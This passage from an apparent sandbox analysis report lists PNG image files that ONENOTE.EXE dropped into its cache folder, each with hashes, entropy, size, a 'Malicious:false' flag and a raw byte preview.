                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001F.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13084
                                                                                                                                                                                                          Entropy (8bit):7.940058639272698
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                                                                                          MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                                                                                          SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                                                                                          SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                                                                                          SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001G.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001H.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4847
                                                                                                                                                                                                          Entropy (8bit):7.950192613458318
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                                                                                          MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                                                                                          SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                                                                                          SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                                                                                          SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001I.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001J.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1657
                                                                                                                                                                                                          Entropy (8bit):7.80882577056055
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                                                                                          MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                                                                                          SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                                                                                          SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                                                                                          SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001K.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2210
                                                                                                                                                                                                          Entropy (8bit):7.86853667196985
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                                                                                          MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                                                                                          SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                                                                                          SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                                                                                          SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001L.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):14458
                                                                                                                                                                                                          Entropy (8bit):7.944094738048628
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                                                                                          MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                                                                                          SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                                                                                          SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                                                                                          SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001M.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13030
                                                                                                                                                                                                          Entropy (8bit):7.948664903731204
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                                                                                          MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                                                                                          SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                                                                                          SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                                                                                          SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001N.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):3879
                                                                                                                                                                                                          Entropy (8bit):7.9281351307465044
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                                                                                          MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                                                                                          SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                                                                                          SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                                                                                          SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001O.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):19235
                                                                                                                                                                                                          Entropy (8bit):7.944867159042578
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                                                                                          MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                                                                                          SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                                                                                          SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                                                                                          SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001P.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):7374
                                                                                                                                                                                                          Entropy (8bit):7.955141875077912
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                                                                                          MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                                                                                          SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                                                                                          SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                                                                                          SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001Q.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
